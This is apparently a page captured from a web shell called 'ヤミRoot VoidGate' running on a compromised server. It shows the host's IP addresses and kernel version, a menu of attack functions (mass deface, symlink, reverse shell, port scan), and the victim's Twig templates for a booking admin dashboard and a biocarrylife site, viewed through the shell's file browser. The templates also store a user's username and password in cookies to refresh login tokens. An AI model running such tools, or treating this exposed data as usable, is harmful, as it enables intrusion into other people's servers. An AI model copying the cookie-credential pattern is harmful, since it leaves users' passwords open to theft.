ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
fixtures
/
assert
/
Viewing: templates.tar
admin/index.html.twig 0000644 00000001460 15117166026 0010610 0 ustar 00 {% extends 'base.html.twig' %} {% block title %}Hello AdminController!{% endblock %} {% block body %} <style> .example-wrapper { margin: 1em auto; max-width: 800px; width: 95%; font: 18px/1.5 sans-serif; } .example-wrapper code { background: #F5F5F5; padding: 2px 6px; } </style> <div class="example-wrapper"> <h1>Hello {{ controller_name }}! ✅</h1> This friendly message is coming from: <ul> <li>Your controller at <code><a href="{{ 'C:/wamp64/www/loger-api/src/Controller/AdminController.php'|file_link(0) }}">src/Controller/AdminController.php</a></code></li> <li>Your template at <code><a href="{{ 'C:/wamp64/www/loger-api/templates/admin/building_details_index.html.twig'|file_link(0) }}">templates/admin/index.html.twig</a></code></li> </ul> </div> {% endblock %} admin/my-dashboard.html.twig 0000644 00000062304 15117166026 0012057 0 ustar 00 {% extends '@EasyAdmin/page/content.html.twig' %} {% block page_actions %} <div class="form-group" style="margin-top: -30px; margin-right: 10px"> <select class="form-control" id="selectedDate" onchange="getStat()"> {% for date in dates %} <option value="{{ date }}">{{ date }}</option> {% endfor %} </select> </div> <div class="form-group" style="margin-top: -30px; margin-right:20px"> <select class="form-control" id="selectedMonth" onchange="getStat()"> <option value="01" {% if currentMonth=="01" %} selected {% endif %} > January</option> <option value="02" {% if currentMonth=="02" %} selected {% endif %}>Febuary</option> <option value="03" {% if currentMonth=="03" %} selected {% endif %} >March</option> <option value="04" {% if currentMonth=="04" %} selected {% endif %} >April</option> <option value="05" {% if currentMonth=="05" %} selected {% endif %} >May</option> <option value="06" {% if currentMonth=="06" %} selected {% endif %} >June</option> <option value="07" {% if currentMonth=="07" %} selected {% endif %} >July</option> <option value="08" {% if currentMonth=="08" %} selected {% endif %} >August</option> <option value="09" {% if currentMonth=="09" %} selected {% endif %} >September</option> <option value="10" {% if currentMonth=="10" %} selected {% endif %} >October</option> <option value="11" {% if currentMonth=="11" %} selected {% endif %} >November</option> <option value="12" {% if currentMonth=="12" %} selected {% endif %} >December</option> </select> </div> <button type="button" style="margin-top: -20px" class="btn btn-primary"> <i class="fa fa-bell"></i> Notifications <span class="badge badge-light">{{ notification }}</span> </button> {% endblock %} {% block main %} <style> .z-depth-3{ background-color: #fff; -webkit-box-shadow: 0 6px 10px 0 rgba(0,0,0,0.14), 0 1px 18px 0 rgba(104, 159, 89, 0.73), 0 3px 5px -1px rgba(0,0,0,0.3); box-shadow: 0 6px 10px 0 rgba(0,0,0,0.14), 0 1px 18px 0 rgba(0,0,0,0.12), 0 3px 5px -1px rgba(77, 162, 135, 0.47); border-radius: 1px; } .highcharts-figure, .highcharts-data-table table { min-width: 320px; max-width: 800px; margin: 1em auto; } .highcharts-data-table table { font-family: Verdana, sans-serif; border-collapse: collapse; border: 1px solid #ebebeb; margin: 5px auto; text-align: center; width: 100%; max-width: 500px; } .highcharts-data-table caption { padding: 1em 0; font-size: 1.2em; color: #555; } .highcharts-data-table th { font-weight: 600; padding: 0.5em; } .highcharts-data-table td, .highcharts-data-table th, .highcharts-data-table caption { padding: 0.5em; } .highcharts-data-table thead tr, .highcharts-data-table tr:nth-child(even) { background: #f8f8f8; } .highcharts-data-table tr:hover { background: #f1f7ff; } input[type="number"] { min-width: 50px; } </style> <div class="container"> <div class="row" style="margin-top: -20px; margin-bottom: 10px"> <div class="col-sm-12" style="margin-top: -20px"> <h4>Hi, {{ user.firstName }}</h4> </div> </div> <div class="row"> <div class="col-sm-12 col-md-6 col-lg-3 " > <div class="row "> <div class="col-sm-12 col-md-10 z-depth-3 card "> <div class="row align-items-center" style=""> <div class="col-sm-12 align-self-center "> <div class="row"> <div class="col-sm-3"> <i class="fa align-self-center fa-building" style="color:green; font-size: 40px; margin: 10px"></i> </div> <div class="col-sm-8"> <h6 style="margin-top: 10px; position: relative; float: right">Companies</h6> <h4 class="align-self-center" style="margin-top: 30px; margin-right: 10px; right: 0; position: absolute; float: right">{{ companies|length }}</h4> </div> </div> </div> </div> </div> </div> </div> <div class="col-sm-12 col-md-6 col-lg-3 "> <div class="row "> <div class="col-sm-12 col-md-10 z-depth-3 card offset-md-2 "> <div class="row align-items-center" style=""> <div class="col-sm-12 align-self-center "> <div class="row"> <div class="col-sm-3"> <i class="fa align-self-center fa-address-book-o" style="color:dodgerblue;font-size: 40px; margin: 10px"></i> </div> <div class="col-sm-8"> <h6 style="margin-top: 10px; position: relative; float: right">Buildings</h6> <h4 class="align-self-center" style=" margin-top: 30px; margin-right: 10px; right: 0; position: absolute;">{{ buildings|length }}</h4> </div> </div> </div> </div> </div> </div> </div> <div class="col-sm-12 col-md-6 col-lg-3 "> <div class="row "> <div class="col-sm-12 col-md-10 z-depth-3 card offset-md-2 "> <div class="row align-items-center" style=""> <div class="col-sm-12 align-self-center "> <div class="row"> <div class="col-sm-3"> <i class="fa align-self-center fa-users" style="color:darkcyan;font-size: 40px; margin: 10px"></i> </div> <div class="col-sm-8"> <h6 style="margin-top: 10px; position: relative; float: right">Users</h6> <h4 class="align-self-center" style="margin-top: 30px; margin-right: 10px; right: 0; position: absolute;"> {{ users|length }}</h4> </div> </div> </div> </div> </div> </div> </div> <div class="col-sm-12 col-md-6 col-lg-3 "> <div class="row "> <div class="col-sm-12 col-md-10 z-depth-3 card offset-md-2 "> <div class="row align-items-center" style=""> <div class="col-sm-12 align-self-center "> <div class="row"> <div class="col-sm-3"> <i class="fa align-self-center fa-dollar" style="color:gold;font-size: 40px; margin: 10px"></i> </div> <div class="col-sm-8"> <h6 style="margin-top: 10px; position: relative; float: right">Income (Xaf)</h6> <h4 class="align-self-center" style=" margin-top: 30px; margin-right: 10px; right: 0; position: absolute;"> {{ income|number_format(2, '.', ',') }} </h4> </div> </div> </div> </div> </div> </div> </div> </div> <div class="row" style="margin-top: 20px"> <div class="col-sm-12 col-md-6 col-lg-8"> <img id="loadingLine" src="{{ asset("img/loading.gif") }}" alt="" style="max-height: 200px" class="d-none"> <figure class="highcharts-figure"> <div id="container-line"></div> <p class="highcharts-description"> </p> </figure> </div> <div class="col-sm-12 col-md-6 col-lg-4"> <img id="loadingPie" src="{{ asset("img/loading.gif") }}" alt="" style="max-height: 200px" class="d-none"> <figure class="highcharts-figure"> <div id="container-pie"></div> <p class="highcharts-description"> </p> </figure> </div> </div> <div class="row" style="margin-bottom: 30px"> <table class="table datagrid col-sm-12 " > <thead> <tr> <td>#ID</td> <td>Booking</td> <td>Created At</td> <td>Action</td> </tr> </thead> <tbody> {% set i=0 %} {% for data in bookings %} {% if(i < 5) %} <tr class="z-depth-3" style="margin: 10px"> <td >{{ data.id }}</td> <td >{{ data }}</td> <td >{{ data.createdAt|date("F j, Y H:i") }}</td> <td> {% if data.hasVue %} <a href="{{ path('display_booking_room', { 'booking_id': data.id }) }}" onclick="checkBooking({{ data.id }})" data-toggle="modal" data-target="#booking_{{ data.id }}" id="btn_booking_{{ data.id }}" class=""> <i class="fa fa-eye-slash red" style="color: red; font-size: 20px"></i> </a> {%endif %} {% if data.hasVue==false %} <a href="{{ path('display_booking_room', { 'booking_id': data.id }) }}" onclick="checkBooking({{ data.id }})" data-toggle="modal" data-target="#booking_{{ data.id }}" id="btn_booking_{{ data.id }}" class=""> <i class="fa fa-eye grey" style="color: deepskyblue; font-size: 25px"></i> </a> {%endif %} </td> </tr> {% set i=i+1 %} {%endif %} {% endfor %} </tbody> </table> </div> </div> <!-- Modal --> <div class="modal fade" id="exampleModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLabel">Modal title</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> ... </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="button" class="btn btn-primary">Save changes</button> </div> </div> </div> </div> {% endblock %} {% block body_javascript %} {{ parent() }} <script src="{{ asset('js/jquery-3.2.1.min.js') }}"></script> <script src="https://code.highcharts.com/highcharts.js"></script> <script src="https://code.highcharts.com/modules/exporting.js"></script> <script src="https://code.highcharts.com/modules/export-data.js"></script> <script src="https://code.highcharts.com/modules/accessibility.js"></script> <script type="text/javascript"> function checkBooking(bookingId){ $("#exampleModal").attr("id","booking_"+bookingId); $('#booking_'+bookingId).on('shown.bs.modal', function () { }) $('#btn_booking_'+bookingId).on('click', function(e) { e.preventDefault(); $('#booking_'+bookingId).modal({ backdrop: true, keyboard: true }) .on('click', '#modal-import-button', function () { let importForm = $('#btn_booking_'+bookingId); importForm.attr('action'); $('#btn_booking_'+bookingId).triggerHandler('click'); }); }); } $(document).ready(function(){ setCookie( "connected_user", "{{ user.lastName }} {{ user.firstName }}" ,1); setCookie( "connected_user_id", "{{ user.id }}" ,1); $(".user-name").html("{{ user.lastName }} {{ user.firstName }}") }); var dataPie=[],i=0, dataDisplay, total=0; {% for data in arrayOfChart %} dataDisplay=0 {% set items = data.data %} {% for item in items %} dataDisplay+={{ item }}; {% endfor %} total+=dataDisplay; dataPie[i]={name: "{{ data.name }}", y:dataDisplay}; i++; {% endfor %} Highcharts.chart('container-pie', { chart: { plotBackgroundColor: null, plotBorderWidth: null, plotShadow: false, type: 'pie' }, title: { text: 'Proportion Per Company ('+formatNumber(total)+'Xaf)', align: 'left' }, tooltip: { pointFormat: '{series.name}: <b>{point.percentage:.1f}%</b>' }, accessibility: { point: { valueSuffix: '%' } }, plotOptions: { pie: { allowPointSelect: true, cursor: 'pointer', dataLabels: { enabled: true, format: '<b>{point.name}</b>: {point.percentage:.1f} %' } } }, series: [{ name: 'Brands', colorByPoint: true, data:dataPie }] }); var dataChart=[],i =0, categories=[]; var z=0; {% for item in days %} categories[z]="{{ item }}"; z++ {% endfor %} {% for data in arrayOfChart %} var j=0,data=[]; {% set items = data.data %} {% for item in items %} data[j]={{ item }}; j++ {% endfor %} dataChart[i]={"name": "{{ data.name }}", "data":data}; i++; {% endfor %} Highcharts.chart('container-line', { title: { text: 'Total revue On {{ desc }} ('+formatNumber(total)+"Xaf)", align: 'left' }, tooltip: { pointFormat: '{series.name}: <b>{point.y} Xaf</b>' }, subtitle: { text: 'By partner. Source: <a href="#!" ">Loger.cm</a>.', align: 'left' }, yAxis: { title: { text: 'Total Booking' } }, xAxis: { categories:categories, showLabel: false, enable: false, labels: { format: '{value}', enable: false, }, }, plotOptions: { series: { cursor: 'pointer', className: 'popup-on-click', marker: { lineWidth: 1 } } }, series:dataChart, responsive: { rules: [{ condition: { maxWidth: 500 }, chartOptions: { legend: { layout: 'horizontal', align: 'center', verticalAlign: 'bottom' } } }] } }); function formatNumber(number) { number = number.toFixed(2) + ''; x = number.split('.'); x1 = x[0]; x2 = x.length > 1 ? '.' + x[1] : ''; var rgx = /(\d+)(\d{3})/; while (rgx.test(x1)) { x1 = x1.replace(rgx, '$1' + ',' + '$2'); } return x1 + x2; } </script> <script type="text/javascript"> function getStat() { var selectedMonth =$("#selectedMonth").val() , selectedDate=$("#selectedDate").val(); var months="January"; if(selectedMonth=="02"){ months="Febuary" }else if(selectedMonth=="03"){ months="March" }else if(selectedMonth=="04"){ months="April" }else if(selectedMonth=="05"){ months="May" }else if(selectedMonth=="06"){ months="June" }else if(selectedMonth=="07"){ months="July" }else if(selectedMonth=="08"){ months="August" }else if(selectedMonth=="09"){ months="September" }else if(selectedMonth=="10"){ months="October" }else if(selectedMonth=="11"){ months="November" }else if(selectedMonth=="12"){ months="December" } $.ajax({ method: "POST", tryCount : 0, retryLimit : 4, "url": "{{ path("getStat") }}", "headers": { "Content-Type": "application/json", }, data: JSON.stringify({ "year": selectedDate, "month": selectedMonth, }), beforeSend:function () { $("#loadingLine").removeClass("d-none"); $("#loadingPie").removeClass("d-none"); $("#container-line").addClass("d-none"); $("#container-pie").addClass("d-none"); }, success: function(data){ $("#loadingLine").addClass("d-none"); $("#loadingPie").addClass("d-none"); $("#container-line").removeClass("d-none"); $("#container-pie").removeClass("d-none"); console.log(data); var dataChart=[],i =0, categories=[]; var z=0; {% for item in days %} categories[z]="{{ item }}"; z++ {% endfor %} var total=0; var dataPie=[] for(i=0; i<data.length; i++){ var pieTotal=0; for(j=0; j<data[i].data.length; j++){ total+=data[i].data[j]; pieTotal+=data[i].data[j]; } dataPie[i]={"name": data[i].name, y:pieTotal}; } console.log(dataPie); Highcharts.chart('container-line', { title: { text: 'Total revue On '+months+' '+selectedDate+' ('+formatNumber(total)+"Xaf)", align: 'left' }, tooltip: { pointFormat: '{series.name}: <b>{point.y} Xaf</b>' }, subtitle: { text: 'By partner. Source: <a href="#!" ">Loger.cm</a>.', align: 'left' }, yAxis: { title: { text: 'Total Booking' } }, xAxis: { categories:categories, showLabel: false, enable: false, labels: { format: '{value}', enable: false, }, }, plotOptions: { series: { cursor: 'pointer', className: 'popup-on-click', marker: { lineWidth: 1 } } }, series:data, responsive: { rules: [{ condition: { maxWidth: 500 }, chartOptions: { legend: { layout: 'horizontal', align: 'center', verticalAlign: 'bottom' } } }] } }); Highcharts.chart('container-pie', { chart: { plotBackgroundColor: null, plotBorderWidth: null, plotShadow: false, type: 'pie' }, title: { text: 'Proportion Per Company ('+formatNumber(total)+'Xaf) '+months+' '+selectedDate, align: 'left' }, tooltip: { pointFormat: '{series.name}: <b>{point.percentage:.1f}%</b>' }, accessibility: { point: { valueSuffix: '%' } }, plotOptions: { pie: { allowPointSelect: true, cursor: 'pointer', dataLabels: { enabled: true, format: '<b>{point.name}</b>: {point.percentage:.1f} %' } } }, series: [{ name: 'Brands', colorByPoint: true, data:dataPie }] }); }, error:function (xhr, textStatus, errorThrown) { $("#loadingLine").addClass("d-none"); $("#loadingPie").addClass("d-none"); $("#container-line").removeClass("d-none"); $("#container-pie").removeClass("d-none"); } }); } </script> {% endblock %} base-email.html.twig 0000644 00000020005 15117166026 0010404 0 ustar 00 <!DOCTYPE html> <html> <head> {% block stylesheets %} <!--Import Google Icon Font--> <link href="https://fonts.googleapis.com/css?family=Montserrat|Reem+Kufi|Roboto" rel="stylesheet"> <!--Import materialize.css--> <link href="{{absolute_url( asset('css/materialize.min.css') )}}" rel="stylesheet" /> <link href="{{absolute_url( asset('css/main.css') )}}" rel="stylesheet" /> <link href="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/css/select2.min.css" rel="stylesheet" /> <link href="{{absolute_url( asset('fonts/fontawesome/css/fontawesome.css')) }}" rel="stylesheet"> <link href="{{absolute_url( asset('fonts/fontawesome/css/brands.css') )}}" rel="stylesheet"> <link href="{{ absolute_url(asset('fonts/fontawesome/css/solid.css') )}}" rel="stylesheet"> <link href="https://unpkg.com/aos@2.3.1/dist/aos.css" rel="stylesheet"> <link rel="stylesheet" type="text/css" href="https://csshake.surge.sh/csshake.min.css"> <link rel="stylesheet" type="text/css" href="{{absolute_url( asset('css/select2.min.css')) }}"> <link rel="stylesheet" type="text/css" href="{{ absolute_url(asset('css/slick.css')) }}"> <link rel="stylesheet" type="text/css" href="{{absolute_url( asset('css/slick-theme.css')) }}"> <link rel="stylesheet" type="text/css" href="{{ absolute_url(asset('css/sweetalert2.min.css')) }}"> <link rel="stylesheet" type="text/css" href="{{ absolute_url(asset('css/swiper.css') )}}"> <link rel="stylesheet" type="text/css" href="{{ absolute_url(asset('css/animate.css')) }}"> <meta name="twitter:site" content="@biocarrylife"> <meta name="twitter:creator" content="@biocarrylife"> <meta property="twitter:description" content="Biocarrylife entreprise LEADER dans la fabrication et la distribution des produits bio naturels dédiés au cosmétique et à la consommation alimentaire"> <meta property="twitter:title" content="biocarrylife"> <meta property="twitter:url" content="https://biocarrylife.com/"> <meta property="twitter:image" content="{{ absolute_url(asset('img/logo_main.png')) }}"> <meta name="twitter:domain" content="biocarrylife.com"> <meta property="og:description" content="Biocarrylife entreprise LEADER dans la fabrication et la distribution des produits bio naturels dédiés au cosmétique et à la consommation alimentaire"> <meta property="og:image" content="{{absolute_url( asset('img/logo_main.png')) }}"> <meta property="og:site_name" content="https://biocarrylife.com"> <meta property="og:title" content="biocarrylife"> <meta property="og:updated_time" content=""> <meta property="og:url" content="https://www.biocarrylife.com"> <meta itemprop="name" content="biocarrylife"> <meta itemprop="keywords" content="produit cosmetic, huile végétale, bio, naturel, beurre, cacao, café"> <link rel="icon" href="{{ absolute_url(asset('img/favicon_io/favicon.ico')) }}"> {% endblock %} <title>{% block title %}Welcome!{% endblock %}</title> </head> <body> {% block body %} {% endblock %} {% block javascripts %} <script src="{{ absolute_url(asset('js/jquery-3.2.1.min.js') )}}"></script> <script src="{{ absolute_url(asset('js/materialize.min.js') )}}"></script> <script src="{{ absolute_url(asset('js/sweetalert2.all.min.js')) }}"></script> <script src="{{ absolute_url(asset('js/slick.js')) }}"></script> <script src="{{ absolute_url(asset('js/callus.js')) }}"></script> <script src="{{ absolute_url(asset('js/aes.js')) }}"></script> <script src="{{ absolute_url(asset('js/tripledes.js') )}}"></script> <script src="{{ absolute_url(asset('js/enc-base64-min.js')) }}"></script> <script src="{{ absolute_url(asset('js/index.js')) }}"></script> <script src="https://unpkg.com/aos@2.3.1/dist/aos.js"></script> <script src="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/js/select2.min.js"></script> {% endblock %} <footer class="page-footer " style="background: #14965d;"> <div class="row"> <div class="col m6 s12 center-align center-block center"> <a href="#!" style="position: relative; z-index: 100; width: 100px; height: 100px; margin-right: 5px; border-radius: 50%;"> <img src="{{ asset('img/logo_white.png') }}" style="max-height: 100px; " alt=""> </a> <div class="col s12"> <p style="font-size: 21px">{{ companyName}}</p> </div> <div class="col s12 " style="margin-top: -20px"> <p style="font-size: 20px;margin-top: -4px "> {% trans %}La diversité du naturel dans toute son authenticité{% endtrans %} !</p> </div> <div class="col s12 center " > <a class=" waves-effect waves-light " target="_blank" href="https://web.facebook.com/Biocarrylife" style="border-color: #14965d; ; width: 46px; height: 46px; margin-right: 5px; border-radius: 50%; border-style: solid;border-width: 2px; "> <i class="fab fa-facebook-f " style=" color:#e5bd02; font-size: 22px; margin-top: 3px; margin-left: -12px; position: absolute"></i> </a> <a class=" waves-effect waves-light " target="_blank" href="https://twitter.com" style="border-color: #14965d; ; width: 46px; height: 46px; margin-right: 5px; border-radius: 50%; border-style: solid;border-width: 2px; "> <i class="fab fa-twitter " style=" font-size: 22px; margin-top: 3px; margin-left: -12px; position: absolute;color:#e5bd02; "></i> </a> <a class=" waves-effect waves-light " target="_blank" href="https://www.instagram.com/biocarrylife2/?hl=fr" style="border-color: #14965d; ; width: 46px; height: 46px; margin-right: 5px; border-radius: 50%; border-style: solid;border-width: 2px; "> <i class="fab fa-instagram " style=" font-size: 22px; margin-top: 3px; margin-left: -12px; position: absolute; color:#e5bd02; "></i> </a> <div class="col s12 center-align center"> +237 698601596 /674493242 <br> info-service@biocarrylife.com </div> </div> </div> <div class="col m6 s12 "> <div class="col l12 s12 m12 xl12 " style=" "> <h5 class=" white-text" style=" font-family:'Reem Kufi', sans-serif"><b>{% trans %}NewsLetter{% endtrans %} </b></h5> <hr> <form onsubmit="return false;" id="new_letter_form" class="col l12 m12 s12 xl12" style=" margin-bottom: 6%; margin-top: 30px"> <div class="input-field col s12 xl8 " style="margin-top: 5px; "> <i class="fas fa-blog prefix white-text active" style="font-size: 20px"></i> <input type="email" name="new_letter_sus" id="new_letter" class="validate" style="color: #fff;" required="required"> <label for="new_letter" class="active">{% trans %}Entrer Votre Adresse Mail{% endtrans %} </label> </div> <button id="btnNewLetter" onclick=" addToNewLetter ()" type="submit" class="btn indigo-text col button s12 xl4" style="font-size: 12px">{% trans %}S'incrire{% endtrans %} <i class="fas fa-plus-circle right active"></i> </button> <div class="col s12"> <p style="font-size: 20px">{% trans %}Souscrivez à notre mail list pour avoir des nouveautés dans votre inbox{% endtrans %} .</p> </div> </form> </div> </div> </div> <div class="footer-copyright"> <div class="container center center-align"> © 2022 {{ companyName}}. All Rights Reserved </div> </div> </footer> </body> </html> base_admin.html.twig 0000644 00000055304 15117166026 0010501 0 ustar 00 <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <!--Let browser know website is optimized for mobile--> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content="LEADER dans la fabrication et la distribution des produits bio naturels dédiés au cosmétique et à la consommation alimentaire"> <link href="https://fonts.googleapis.com/css?family=Montserrat|Reem+Kufi|Roboto" rel="stylesheet"> {% block stylesheets %} <!--Import Google Icon Font--> <link href="https://fonts.googleapis.com/css?family=Montserrat|Reem+Kufi|Roboto" rel="stylesheet"> <!--Import materialize.css--> <link href="{{ asset('css/materialize.min.css') }}" rel="stylesheet" /> <link href="{{ asset('css/main.css') }}" rel="stylesheet" /> <link href="{{ asset('fonts/fontawesome/css/fontawesome.css') }}" rel="stylesheet"> <link href="{{ asset('fonts/fontawesome/css/brands.css') }}" rel="stylesheet"> <link href="{{ asset('fonts/fontawesome/css/solid.css') }}" rel="stylesheet"> <link href="https://unpkg.com/aos@2.3.1/dist/aos.css" rel="stylesheet"> <link rel="stylesheet" type="text/css" href="https://csshake.surge.sh/csshake.min.css"> <link href="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/css/select2.min.css" rel="stylesheet" /> <link rel="stylesheet" type="text/css" href="{{ asset('css/slick.css') }}"> <link rel="stylesheet" type="text/css" href="{{ asset('css/slick-theme.css') }}"> <link rel="stylesheet" type="text/css" href="{{ asset('css/sweetalert2.min.css') }}"> <link rel="stylesheet" type="text/css" href="{{ asset('css/swiper.css') }}"> <link rel="stylesheet" type="text/css" href="{{ asset('css/animate.css') }}"> <link rel="stylesheet" type="text/css" href="//cdn.datatables.net/1.11.5/css/jquery.dataTables.min.css"> <link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/buttons/2.2.2/css/buttons.dataTables.min.css"> <meta name="twitter:site" content="@ngouaha1"> <meta name="twitter:creator" content="@ngouaha1"> <meta property="twitter:description" content="LEADER dans la fabrication et la distribution des produits bio naturels dédiés au cosmétique et à la consommation alimentaire"> <meta property="twitter:title" content="biocarrylife"> <meta property="twitter:url" content="https://biocarrylife.com/"> <meta property="twitter:image" content="{{ asset('img/icon_web.png') }}"> <meta name="twitter:domain" content="biocarrylife.com"> <meta property="og:description" content="LEADER dans la fabrication et la distribution des produits bio naturels dédiés au cosmétique et à la consommation alimentaire"> <meta property="og:image" content="{{ asset('img/icon_web.png') }}"> <meta property="og:site_name" content="https://biocarrylife.com"> <meta property="og:title" content="biocarrylife"> <meta property="og:updated_time" content=""> <meta property="og:url" content="https://www.biocarrylife.com"> <meta itemprop="name" content="biocarrylife"> <meta itemprop="keywords" content="transfert, argent, money,"> <link rel="icon" href="{{ asset('img/favicon_io/favicon.ico') }}"> {% endblock %} <title>{% block title %}Welcome!{% endblock %}</title> </head> <body> {% block body %} <nav style="background: -webkit-linear-gradient(45deg, #14965d, #e5bd02 ); height: 80px"> <div class="nav-wrapper"> <ul class="left"> <li> <a href="{{ path('admin_panel') }}" class="brand-logo " style="position: relative; z-index: 100; width: 100px; height: 100px; margin-right: 5px; border-radius: 50%;"> <img src="{{ asset('img/logo_white.png') }}" style="max-height: 95px; margin-top: -10px; border-radius: 50%;" alt=""> </a> </li> </ul> <ul id="nav-mobile" class=" right"> <li class=" hide-on-small-and-down " ><a href="{{ path('admin_panel') }}">Accueil</a></li> <li class=" hide " > <a href="{{ path('admin_profile') }}" > Mon Compte <i class="fas fa-user-edit " style=" color:white; font-size: 15px; margin-top: 3px; "></i> </a> </li> <li class=" " ><a href="#!" onclick="logOut()">Deconnexion</a></li> <li class=" hide-on-small-and-down " style="margin-left: 20px"><a href="#" class="dropdown-button" data-activates='choose_language'><i class="fas fa-globe"></i></a></li> <a href="#" data-activates="slide-out" class="button-collapse show-on-medium-and-down"><i class="fas fa-bars"></i></a> </ul> </div> </nav> <!-- Dropdown Structure --> <ul id='choose_language' class='dropdown-content'> <li><a href="#!">Anglais</a></li> <li><a href="#!">Espagnole</a></li> </ul> <ul id="slide-out" class="side-nav"> <li><a href="{{ path('admin_panel') }}">Accueil</a></li> <li class=" " ><a href="#!" onclick="logOut()">Deconnexion</a></li> </ul> {% endblock %} {% block javascripts %} <script src="{{ asset('js/jquery-3.2.1.min.js') }}"></script> <script src="{{ asset('js/materialize.min.js') }}"></script> <script src="{{ asset('js/sweetalert2.all.min.js') }}"></script> <script src="{{ asset('js/slick.js') }}"></script> <script src="{{ asset('js/callus.js') }}"></script> <script src="{{ asset('js/aes.js') }}"></script> <script src="{{ asset('js/tripledes.js') }}"></script> <script src="{{ asset('js/enc-base64-min.js') }}"></script> <script src="{{ asset('js/index.js') }}"></script> <script src="https://unpkg.com/aos@2.3.1/dist/aos.js"></script> <script src="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/js/select2.min.js"></script> <script src="//cdn.datatables.net/1.11.5/js/jquery.dataTables.min.js"></script> <script src="https://cdn.datatables.net/buttons/2.2.2/js/dataTables.buttons.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jszip/3.1.3/jszip.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/pdfmake/0.1.53/pdfmake.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/pdfmake/0.1.53/vfs_fonts.js"></script> <script src="https://cdn.datatables.net/buttons/2.2.2/js/buttons.html5.min.js"></script> <script src="https://cdn.datatables.net/buttons/2.2.2/js/buttons.print.min.js"></script> <script type="text/javascript"> var host = window.location.protocol+"//"+ window.location.host; if(window.location.host==="localhost"){ apiBaseUrl=host+"/biocarrylife/public/api/v1/" }else{ if(window.location.host=="testshare.epassevents.cm"){ apiBaseUrl=host+"/biocarrylife/public/api/v1/" }else{ apiBaseUrl=host+"/public/api/v1/" } } var loginUrl="{{ path('authentication_token') }}"; function refreshToken() { $.ajax({ method: "POST", tryCount : 0, retryLimit : 4, url: host+loginUrl, "headers": { "Content-Type": "application/json" }, data: JSON.stringify({ "username":getCookie("biocarrylife_user_username"), "password":getCookie("biocarrylife_user_userpass")}), beforeSend:function () { }, success: function(data){ setCookie("biocarrylife_user_token",data.token,1); }, error:function (xhr, textStatus, errorThrown) { } }); } function logOut() { setCookie("biocarrylife_user_username","",1); setCookie("biocarrylife_user_userpass","",1); setCookie("biocarrylife_user","",1); var host = window.location.host; // window.location(host+"//"+"user//log") var url = document.URL; var loginUrl="<?php {{ path('user_log') }} ?>"; //alert(loginUrl); Swal.fire({ icon: 'success', title: 'A bientôt!', showClass: { popup: 'animate__animated animate__fadeInDown' }, hideClass: { popup: 'animate__animated animate__fadeOutUp' } }) setTimeout(function () { window.location.assign("{{ path('user_log') }}") },5000); } $( document ).ready(function(){ $(".button-collapse").sideNav(); $('.dropdown-button').dropdown({ inDuration: 300, outDuration: 225, constrainWidth: false, // Does not change width of dropdown to that of the activator hover: true, // Activate on hover gutter: 0, // Spacing from edge belowOrigin: true, // Displays dropdown below the button alignment: 'left', // Displays dropdown with edge aligned to the left of button stopPropagation: false // Stops event propagation } ); if(getCookie("biocarrylife_user")==""){ var host = window.location.host; // window.location(host+"//"+"user//log") var url = document.URL; var loginUrl="<?php {{ path('user_log') }} ?>"; //alert(loginUrl); Swal.fire({ icon: 'warning', title: 'Votre session a expiré!', showClass: { popup: 'animate__animated animate__fadeInDown' }, hideClass: { popup: 'animate__animated animate__fadeOutUp' } }) setTimeout(function () { window.location.assign("{{ path('user_log') }}"+"?page="+url) },5000); }else{ //userEmailMenu,userNameMenu $("#userEmailMenu").html(JSON.parse(getCookie("biocarrylife_user")).email); $("#userNameMenu").html( JSON.parse(getCookie("biocarrylife_user")).firstName+" "+ JSON.parse(getCookie("biocarrylife_user")).lastName ); //userEmailMenu,userNameMenu $("#userEmailMenuSlide").html(JSON.parse(getCookie("biocarrylife_user")).email); $("#userNameMenuSlide").html( JSON.parse(getCookie("biocarrylife_user")).firstName+" "+ JSON.parse(getCookie("biocarrylife_user")).lastName ); } }); AOS.init(); var apiBaseUrl; var host = window.location.protocol+"//"+ window.location.host; if(window.location.host==="localhost"){ apiBaseUrl=host+"/biocarrylife/public/api/v1/" }else{ if(window.location.host=="testshare.epassevents.cm"){ apiBaseUrl=host+"/biocarrylife/public/api/v1/" }else{ apiBaseUrl=host+"/public/api/v1/" } } function addToNewLetter () { var locationUrl="{{ path('client_newletter') }}"; var email=$("#new_letter").val(); if(email!=="" && email.search("@")!==-1){ $.ajax({ method: "POST", tryCount : 0, retryLimit : 4, url: host+locationUrl, "headers": { "Content-Type": "application/json" }, data: JSON.stringify({ "email":$("#new_letter").val()}), beforeSend:function () { $("#btnNewLetter").addClass("disable"); }, success: function(data){ if(data==="FOUND"){ Swal.fire( "Vous êtes déjà abonné", "Nous nous enverrons des nouveautés" , 'warning' ); }else{ Swal.fire( "Merci pour votre abonnemment", "....." , 'success' ); } console.log(data); document.getElementById("new_letter").value=""; $("#btnNewLetter").removeClass("disable"); }, error:function (xhr, textStatus, errorThrown) { $("#btnNewLetter").removeClass("disable"); refreshToken() console.log(xhr); } }); }else{ Swal.fire( "Adresse mail incorrect", "!!!!!!!" , 'warning' ); } } </script> {% endblock %} <footer 